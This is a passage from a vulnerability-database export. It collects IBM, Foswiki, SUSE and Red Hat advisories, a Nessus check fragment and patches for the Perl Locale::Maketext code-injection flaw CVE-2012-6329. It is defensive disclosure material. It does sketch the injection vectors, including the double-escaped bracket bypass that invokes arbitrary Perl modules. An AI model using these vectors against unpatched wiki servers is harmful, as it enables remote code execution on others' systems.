\"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-Locale-Maketext-1.220.0-2.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-base-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"perl-devel-5.14.2-8.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"perl-doc-5.14.2-8.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "aix": [{"lastseen": "2020-04-22T00:52:14", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Apr 23 17:08:11 CST 2014\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nhttps://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\nftp://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Security vulnerability in Perl for AIX\n\nPLATFORMS: 5.3, 6.1, and 7.1\n VIOS 2.2.1\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: See below.\n\nCVE Number: CVE-2012-6329\n\nReboot required? NO\nWorkarounds? NO\nProtected by FPM? NO\nProtected by SED? NO\n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n CVE-2012-6329\n -------------\n The _compile function in Maketext.pm in the Locale::Maketext implementation\n in Perl before 5.17.7 does not properly handle backslashes and fully \n qualified method names during compilation of bracket notation, which allows\n context-dependent attackers to execute arbitrary commands via crafted input\n to an application that accepts translation strings from users.\n\nII. CVSS\n\n CVE-2012-6329\n CVSS Base Score: 7.5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/80566 for\n the current score\n CVSS Environmental Score*: Undefined\n CVSS String: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\nIII. PLATFORM VULNERABILITY ASSESSMENT\n\n The following fileset levels are vulnerable:\n\n AIX Fileset AIX Level Lower Level Upper Level\n ----------------------------------------------------------------\n perl.rte 5.3.12 5.8.8.0 5.8.8.123\n perl.rte 6.1.7 5.8.8.0 5.8.8.122\n perl.rte 6.1.8 5.8.8.0 5.8.8.244\n perl.rte 6.1.9 5.8.8.0 5.8.8.366\n perl.rte 7.1.1 5.10.1.0 5.10.1.100\n perl.rte 7.1.2 5.10.1.0 5.10.1.150\n perl.rte 7.1.3 5.10.1.0 5.10.1.200\n\n VIOS\n ----------------------------------------------------------------\n perl.rte versions 5.8.8.0 to 5.8.8.366 on VIOS 2.2.1.0 and above.\n\n Note: To find out whether the affected filesets are installed on your\n systems, refer to the lslpp command found in AIX user's guide.\n\nIV. SOLUTIONS\n\n A. APARS\n\n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR number Availability\n ---------------------------------------------------\n 5.3 IV56641 NOW\n 6.1 IV56641 NOW\n 7.1 IV56642 NOW\n\n VIOS Level APAR number Availability\n ---------------------------------------------------\n 2.2.1.0 and up IV56641 NOW\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV56641\n http://www.ibm.com/support/docview.wss?uid=isg1IV56642\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via http\n from:\n\n\t\thttps://www14.software.ibm.com/webapp/iwm/web/preLogin.do?source=aixbp\n\n\t\tThe perl name provided in the web pack site\n For 5.3:\tperl61.zip\n For 6.1:\tperl61.zip\n For 7.1:\tperl71.zip\n For VIOS: perl61.zip\n\n To extract the fixes from the zip files:\n For 5.3: \tgunzip -S .zip perl61.zip\n For 6.1: \tgunzip -S .zip perl61.zip\n For 7.1:\tgunzip -S .zip perl71.zip\n For VIOS: gunzip -S .zip perl61.zip\n\n\t\tIMPORTANT: It is recommended that a mksysb backup of the system be\n\t\tcreated. Verify that this image is both bootable and readable\n\t\tbefore proceeding.\n\n\t\tTo preview the fix installation:\n\n \t\t\tinstallp -apYd . perl\t\t\t\n\n\t\tTo install the fix package:\n\t\n\t\t\tinstallp -aXYd . perl\n\t\t\nV. WORKAROUNDS\n\n There are no workarounds.\n\nVI. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit:\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pgpkey.txt\n\n C. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n eServer is a trademark of International Business Machines\n Corporation. IBM, AIX and pSeries are registered trademarks of\n International Business Machines Corporation. All other trademarks\n are property of their respective holders.\n\nVII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nVIII. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/80566\n CVE-2012-6329: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (AIX)\n\niEYEARECAAYFAlNYLGwACgkQ4fmd+Ci/qhIkcwCdGTeDNw2OsdOucTB+DatOm1Xd\nzNgAn2rexeS9aaXvG+PawwR0WGgEK7p0\n=d7gB\n-----END PGP SIGNATURE-----\n", "edition": 15, "modified": "2014-04-23T17:08:11", "published": "2014-04-23T17:08:11", "id": "PERL_ADVISORY4.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/perl_advisory4.asc", "title": "Security Vulnerability in Perl _compile", "type": "aix", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-03-06T03:34:50", "edition": 2, "description": "Foswiki versions 1.0.0 through 1.0.10 and 1.1.0 through 1.1.6 suffer from code injection and denial of service vulnerabilities.", "published": "2012-12-18T00:00:00", "type": "zdt", "title": "Foswiki 1.0.10 / 1.1.6 Code Injection / Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-6330", "CVE-2012-6329"], "modified": "2012-12-18T00:00:00", "id": "1337DAY-ID-20000", "href": "https://0day.today/exploit/description/20000", "sourceData": "---+ Security Alert: Code injection vulnerability in MAKETEXT macro,\r\nDenial of Service vulnerability in MAKETEXT macro.\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext, which Foswiki uses to provide translations\r\nwhen {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to run arbitrary shell commands and code on the server through a\r\ncrafted %MAKETEXT% macro. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam as documented in Development.SecurityAlertProcess\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll released versions of Foswiki are vulnerable to these issues\r\n\r\n - Foswiki 1.0.0 - 1.0.10\r\n - Foswiki 1.1.0 - 1.1.6\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2012-6329 to this vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329\r\nCVE-2012-6330 was assigned to the Denial of Service vulnerability, see\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6330\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary.\r\n\r\nA crafted %MAKETEXT{}% macro will pass through strings to\r\nLocale::Maketext where they are executed under the control of the CGI\r\nuser on the server. Any user with the authority to edit a topic,\r\ncomment on a topic, or execute the Foswiki rendering code (eg. The\r\nRenderPlugin) can take advantage of the vulnerability. (CVE-2012-6329)\r\n\r\nA crafted %MAKETEXT{}% macro will consume large amounts of memory and\r\nexhaust swap space. (CVE-2012-6330)\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server can expose the file system.\r\n\r\nA second less severe Denial of Service vulnerability is also addressed\r\nby this alert.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues:\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext.\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %<nop>MAKETEXT{}% not validating the parameter numbers\r\nsupplied in the [_nnn] tokens.\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin [_nnn] tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nOne of the following should be done as soon as possible.\r\n\r\n * Manually Apply hotfix (see patch below). __or__\r\n * Apply the\r\n[[Extensions.PatchItem12285Contrib][http://foswiki.org/Extensions/PatchItem12285Contrib]]\r\nto your Foswiki 1.1.x system (Does not apply to Foswiki 1.0.x) __or__\r\n * Disable {UserInerfaceInternationalization} in your LocalSite.cfg\r\n_(Does not protect against [[SecurityAlert-CVE-2012-6330]])_ __or__\r\n * The foswiki debian package has already been updated with the hotfix\r\n- use your preferred package management tool to update to foswiki 1.1.6-2\r\n\r\nIn addition, CPAN:Locale::Maketext version 1.23 or newer should be\r\ninstalled.\r\n\r\nUpgrade to the latest patched production Download.FoswikiRelease01x01x07\r\nonce released\r\n\r\n*The Foswiki patch fixes other issues with the %MAKETEXT% macro beyond\r\nthe code execution issue. Even if the new Locale::Maketext is installed,\r\nit is strongly recommended to apply the Foswiki patch.*\r\n\r\n\r\n---++ Hotfix for Foswiki Release 1.1.0 - 1.1.6\r\n\r\nInstall http://foswiki.org/Extensions.PatchItem12285Contrib and verify\r\nthat the patch has been applied to lib/Foswiki/Macros/MAKETEXT.pm. The\r\nextension will attempt to apply two patches, and should report that 1\r\nfile was patched. Only one of the patches will match your system. This\r\npatch fixes both CVE-2012-6329 CVE-2012-6330.\r\n\r\n> Running Post-install exit for PatchItem12285Contrib...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-001.patch\r\n> ...\r\n> MD5 Matched - applying patch version Foswiki 1.1.0 - 1.1.2.\r\n> Update successful for /var/www/data/Foswiki-1.1.0/lib/Foswiki/Macros/MAKETEXT.pm\r\n> .\r\n> 1 file patched\r\n> ...\r\n> Processing /var/www/data/Foswiki-1.1.1/working/configure/patch/Item12285-002.patch\r\n> ...\r\n> No files matched patch signatures\r\n\r\n\r\nOn a properly patched system, %MAKETEXT{\" [_101] \"}% should return an\r\nerror.\r\n> Excessive parameter number 101, MAKETEXT rejected. \r\n\r\nNote that this Contrib will also install the\r\nExtensions.PatchFoswikiContrib as a prerequisite. PatchFoswikiContrib\r\npatches the Extensions installer to accept the new style version strings\r\nused for modules released as of 1.1.6.\r\n\r\n---++ Hotfix for Foswiki Archived Release 1.0.0-1.0.10\r\n\r\nThis patch fixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]].\r\n\r\nThis release should be manually patched.\r\n\r\nIn Foswiki.pm, in the sub MAKETEXT\r\n\r\n============ vvv CUT vvv =============\r\n--- Foswiki.pm 2010-01-17 09:16:20.000000000 -0500\r\n+++ Foswiki.pm 2012-12-10 10:06:37.389129654 -0500\r\n@@ -4200,6 +4200,9 @@\r\n $str =~\r\n s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+ return \"Illegal parameter number\" if ($max > 100);\r\n+ $str =~ s#\\\\#\\\\\\\\#g;\r\n+\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || \"\";\r\n\r\n============ ---CUT--- =============\r\n\r\n\r\n---++ Manual patch for Foswiki Release 1.1.0 -> 1.1.6\r\n\r\nInstalling the Extensions.PatchItem12285Contrib is the best way to patch\r\nyour system - you can however see the patch we apply here. This patch\r\nfixes both [[SecurityAlert-CVE-2012-6329]] and\r\n[[SecurityAlert-CVE-2012-6330]]:\r\n\r\n============ vvv CUT vvv =============\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:51:12.959268829 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2012-12-11 10:37:31.674486503 -0500\r\n @@ -4,9 +4,19 @@\r\n use strict;\r\n use warnings;\r\n+use Locale::Maketext;\r\n+my $escape =\r\n+ ( $Foswiki::cfg{UserInterfaceInternationalisation}\r\n+ && $Locale::Maketext::VERSION\r\n+ && $Locale::Maketext::VERSION < 1.23 );\r\n+\r\n sub MAKETEXT {\r\n my ( $this, $params ) = @_;\r\n+ my $max;\r\n+ my $min;\r\n+ my $param_error;\r\n+\r\n my $str = $params->{_DEFAULT} || $params->{string} || \"\";\r\n return \"\" unless $str;\r\n @@ -18,15 +28,22 @@\r\n $str =~ s/~~\\[/~[/g;\r\n $str =~ s/~~\\]/~]/g;\r\n+ $max = 0;\r\n+ $min = 1;\r\n+ $param_error = 0;\r\n+\r\n # unescape parameters and calculate highest parameter number:\r\n- my $max = 0;\r\n- $str =~ s/~\\[(\\_(\\d+))~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+ $str =~ s/~\\[(\\_(\\d+))~\\]/_validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n $str =~\r\n-s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ $max = $2 if ($2 > $max); \"[$1]\"/ge;\r\n+s/~\\[(\\*,\\_(\\d+),[^,]+(,([^,]+))?)~\\]/ _validate($1, $2, $max, $min,\r\n$param_error)/ge;\r\n+ return $str if ($param_error);\r\n # get the args to be interpolated.\r\n my $argsStr = $params->{args} || \"\";\r\n+ # Escape any escapes.\r\n+ $str =~ s#\\\\#\\\\\\\\#g if ($escape); # escape any escapes\r\n+\r\n my @args = split( /\\s*,\\s*/, $argsStr );\r\n # fill omitted args with empty strings\r\n@@ -47,6 +64,26 @@\r\n return $result;\r\n }\r\n+sub _validate {\r\n+\r\n+ #my ( $contents, $number, $max, $min, $param_error ) = @_\r\n+\r\n+ $_[2] = $_[1] if ( $_[1] > $_[2] ); # Record maximum param number\r\n+ $_[3] = $_[1] if ( $_[1] < $_[3] ); # Record minimum param number\r\n+\r\n+ if ( $_[1] > 100 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+\"Excessive parameter number $_[2],\r\nMAKETEXT rejected.\";\r\n+ }\r\n+ if ( $_[1] < 1 ) {\r\n+ $_[4] = 1; # Set error flag\r\n+ return\r\n+\"Invalid parameter <code>\\\"$_[0]\\\"</code>,\r\nMAKETEXT rejected.\";\r\n+ }\r\n+ return \"[$_[0]]\"; # Return the complete bracket parameter\r\nwithout escapes\r\n+}\r\n+\r\n 1;\r\n __END__\r\n Foswiki - The Free and Open Source Wiki, http://foswiki.org/\r\n\r\n============ ^^^ CUT ^^^ =============\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2012-12-05 - The Locale::Maketext vulnerability was discussed on\r\nthe Perl5Porters email list, triggered review of Foswiki code.\r\n * 2012-12-05 - Patched version (1.23) of Locale::Maketext is released.\r\n * 2012-12-08 - The [_999999] DoS issue identified and sent to foswiki\r\nsecurity list.\r\n * 2012-12-09 - The \"remote execution\" vulnerability in\r\nLocale::Maketext was confirmed on Foswiki.\r\n * 2012-12-09 - Requested the CVE from [email\u00a0protected]\r\n * 2012-12-09 - TWiki notified of the Vulnerability.\r\n * 2012-12-10 - Developer fixes code (George Clark) and security team\r\nvalidates the fixes.\r\n * 2012-12-10 - Extensions.PatchItem12285Contrib released for Foswiki\r\n1.1.x\r\n * 2012-12-10 - Security team creates advisory with hotfix.\r\nAnnouncement delayed for coordination with TWiki (George Clark)\r\n * 2012-12-12 - Updated Debian packages released (Sven Dowideit)\r\n * 2012-12-12 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists ( )\r\n * 2012-12-14 - Publish advisory in Support web and update all related\r\ntopics ( )\r\n * 2012-12-14 - Reference to public advisory on Download page and\r\nKnown Issues ( )\r\n * 2012-xx-xx - Release Manager builds patch release ( )\r\n * 2012-xx-xx - Issue a public security advisory ([email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected]) ( )\n\n# 0day.today [2018-03-06] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20000"}, {"lastseen": "2018-02-17T21:31:18", "edition": 2, "description": "This advisory alerts you of a potential security issue with your Foswiki installation. A vulnerability has been reported against the core Perl module CPAN:Locale::Maketext, which Foswiki uses to provide translations when {UserInterfaceInternationalization} is enabled in the configuration. Because of this vulnerability it may be possible for a user to invoke arbitrary perl modules on the server through a crafted macro.", "published": "2013-02-20T00:00:00", "type": "zdt", "title": "Foswiki MAKETEXT 1.1.7 / 1.0.10 Code Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1666", "CVE-2012-6329"], "modified": "2013-02-20T00:00:00", "id": "1337DAY-ID-20407", "href": "https://0day.today/exploit/description/20407", "sourceData": "---+ Security Alert: Code injection vulnerability in MAKETEXT macro\r\n\r\nThis advisory alerts you of a potential security issue with your Foswiki\r\ninstallation. A vulnerability has been reported against the core Perl\r\nmodule CPAN:Locale::Maketext [1], which Foswiki uses to provide\r\ntranslations when {UserInterfaceInternationalization} is enabled in the\r\nconfiguration. Because of this vulnerability it may be possible for a\r\nuser to invoke arbitrary perl modules on the server through a crafted \r\nmacro.\r\n\r\nThe original fix for this issue reported in\r\n[[SecurityAlert-CVE-2012-6329]] [2] failed to eliminate one possible\r\nattack vector. This CVE applies an additional fix for the original issue.\r\n\r\nThe system is *not vulnerable* if ={UserInerfaceInternationalization}= \r\nis not enabled in your configuration, or if =Locale::Maketext= has been\r\nupgraded to version 1.23 as advised in [[SecurityAlert-CVE-2012-6329]] [2].\r\n\r\n---++ Severity Level\r\n\r\nSeverity 1 issue: The web server can be compromised.\r\n\r\nThe severity level was assigned by the Foswiki\r\nCommunity.SecurityTaskTeam [3] as documented in\r\nDevelopment.SecurityAlertProcess [4]\r\n\r\n---++ Vulnerable Software Versions\r\n\r\nAll releases of Foswiki.\r\n * Foswiki-1.0.0 to Foswiki-1.0.10\r\n * Foswiki-1.1.0 to Foswiki-1.1.7\r\n\r\n---++ MITRE Name for this Vulnerability\r\n\r\nThe Common Vulnerabilities and Exposures project has assigned the name\r\nCVE-2013-1666 [5] to this vulnerability.\r\n\r\n---++ Attack Vectors\r\n\r\nEditing wiki pages and HTTP POST requests towards a Foswiki server with\r\nenabled localization (typically port 80/TCP). Typically, prior\r\nauthentication is necessary. If your wiki allows commenting by users\r\nwithout first logging in, then it may be possible for such an anonymous\r\nuser to exploit this vulnerability.\r\n\r\nThe original report ( [[SecurityAlert-CVE-2012-6329]] [2]) against\r\nLocale::Maketext also identified another vector, where a module name can\r\nbe passed in to Locale::Maketext through the bracket notation. At the\r\ntime we determined that Foswiki was not vulnerable to this vector, as\r\nFoswiki does not permit that syntax to be used. __This was incorrect__.\r\nIt is possible to pass bypass the checks by double-escaping the brackets.\r\n\r\n---++ Impact\r\n\r\nArbitrary code execution on the server as the webserver user.\r\n\r\n---++ Details\r\n\r\nA crafted %MAKETEXT{}% macro can cause multiple issues: This CVE\r\naddresses an additional vector:\r\n * NEW *Execute arbitrary perl modules by escaping brackets within\r\nMAKETEXT =~~[Some::Module,~~]= (CVE-2013-1666)*\r\n * Execute arbitrary code on the server by passing unsanitized strings\r\nto Locale::Maketext. (CVE-2012-6329)\r\n * Consume memory and swap space resulting in potential lockup or\r\ncrash due to %MAKETEXT{}% not validating the parameter numbers supplied\r\nin the =[_nnn]= tokens. (CVE-2012-6330)\r\n * Cause an exception within Foswiki, also due to invalid parameters\r\nin =[_nnn]= tokens\r\n\r\n\r\n---++ Countermeasures\r\n\r\nApply one of these countermeasures:\r\n * Apply hotfix (see patch below).\r\n * Install Extensions.PatchItem12391Contrib [6]\r\n * Disable ={UserInerfaceInternationalization}= in your =!LocalSite.cfg=\r\n * Upgrade to Foswiki-1.1.8 once available.\r\n\r\nIn addition to the above, Locale::Maketext should be upgraded to version\r\n1.23.\r\n\r\nYou can verify that the patches are successful by using the following\r\ntwo lines in a test topic:\r\n\r\n * If a warning about MAKETEXT Rejected is displayed here, your system\r\nis patched for Item12285: %MAKETEXT{\"[_101]\"}%\r\n * If ==[quant,4,singular,plural]== is displayed at the end of this\r\nline, your system is patched for Item12391: <tt>%MAKETEXT{\"\r\n~~[quant,4,singular,plural~~] \"}%</tt>\r\n\r\nNote: If the 2nd line displays =~[quant,4,singular,plural~]= (shows the\r\n~ character) then your system is not patched, but is not vulnerable\r\nbecause Internationalization is disabled.\r\n\r\n---++ Authors and Credits\r\n\r\n * John Lightsey for disclosing the issue to the foswiki-security list.\r\n * CrawfordCurrie, PaulHarvey and GeorgeClark for contributing to the\r\nfix, the 1.1.8 release and advisory.\r\n * Members of the Foswiki security team for discussions and for\r\nediting this security advice.\r\n\r\n---++ Hotfix for Foswiki Production Release 1.1.0-1.1.7\r\n\r\nThe line numbers may vary between releases, but the two regular\r\nexpressions should be changed as shown below:\r\n\r\n=================( CUT )================\r\n--- lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:42.520780283 -0500\r\n+++ lib/Foswiki/Macros/MAKETEXT.pm 2013-02-13 10:26:51.362682708 -0500\r\n@@ -25,8 +25,8 @@\r\n $str =~ s/\\]/~]/g;\r\n\r\n # restore already escaped stuff:\r\n- $str =~ s/~~\\[/~[/g;\r\n- $str =~ s/~~\\]/~]/g;\r\n+ $str =~ s/~~+\\[/~[/g;\r\n+ $str =~ s/~~+\\]/~]/g;\r\n\r\n $max = 0;\r\n $min = 1;\r\n\r\n=================( CUT )================\r\n\r\n---++ Hotfix for Foswiki Production Release 1.0.0-1.0.10\r\n\r\nApply the above patch to Foswiki.pm, in the vicinity of line 4193\r\n\r\n---++ Action Plan with Timeline\r\n\r\n * 2013-02-12 - User discloses issue to foswiki security mailing list\r\n(John Lightsey)\r\n * 2013-02-13 - Developer verifies issue (George Clark)\r\n * 2013-02-13 - Security team triage the issue (George Clark, Crawford\r\nCurrie, Paul Harvey)\r\n * 2013-02-13 - Developer fixes code (George Clark)\r\n * 2013-02-14 - Security team creates advisory with hotfix (George Clark)\r\n * 2013-xx-xx - Release Manager builds patch release (name)\r\n * 2013-02-14 - Send alert to foswiki-announce and foswiki-discuss\r\nmailing lists (George Clark)\r\n * 2013-02-19 - Publish advisory in Support web and update all related\r\ntopics (George Clark)\r\n * 2013-02-19 - Reference to public advisory on Download page and\r\nKnown Issues (George Clark)\r\n * 2013-02-19 - Issue a public security advisory ([email\u00a0protected],\r\n[email\u00a0protected], [email\u00a0protected] [email\u00a0protected]\r\n[email\u00a0protected]) (name)\r\n\r\n---++ External Links\r\n\r\n[1] http://search.cpan.org/perldoc?Locale::Maketext\r\n[2] http://foswiki.org/Support/SecurityAlert-CVE-2012-6329\r\n[3] http://foswiki.org/Community/SecurityTaskTeam\r\n[4] http://foswiki.org/Development/SecurityAlertProcess\r\n[5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1666\r\n[6] http://foswiki.org/Extensions/PatchItem12391Contrib\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/20407"}], "suse": [{"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n", "edition": 1, "modified": "2013-03-20T14:04:22", "published": "2013-03-20T14:04:22", "id": "OPENSUSE-SU-2013:0502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00038.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:17:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\n\n", "edition": 1, "modified": "2013-03-20T11:05:11", "published": "2013-03-20T11:05:11", "id": "OPENSUSE-SU-2013:0497-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00037.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n * make getgrent work with long group entries\n [bnc#788388]\n", "edition": 1, "modified": "2013-03-13T00:05:41", "published": "2013-03-13T00:05:41", "id": "SUSE-SU-2013:0442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00015.html", "title": "Security update for Perl (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:48:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n", "edition": 1, "modified": "2013-03-13T00:05:35", "published": "2013-03-13T00:05:35", "id": "SUSE-SU-2013:0441-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00014.html", "type": "suse", "title": "Security update for Perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:44", "bulletinFamily": "unix", "cvelist": ["CVE-2012-5195", "CVE-2012-5526", "CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language commonly used for system\nadministration utilities and web programming.\n\nA heap overflow flaw was found in Perl. If a Perl application allowed\nuser input to control the count argument of the string repeat operator, an\nattacker could cause the application to crash or, potentially, execute\narbitrary code with the privileges of the user running the application.\n(CVE-2012-5195)\n\nA denial of service flaw was found in the way Perl's rehashing code\nimplementation, responsible for recalculation of hash keys 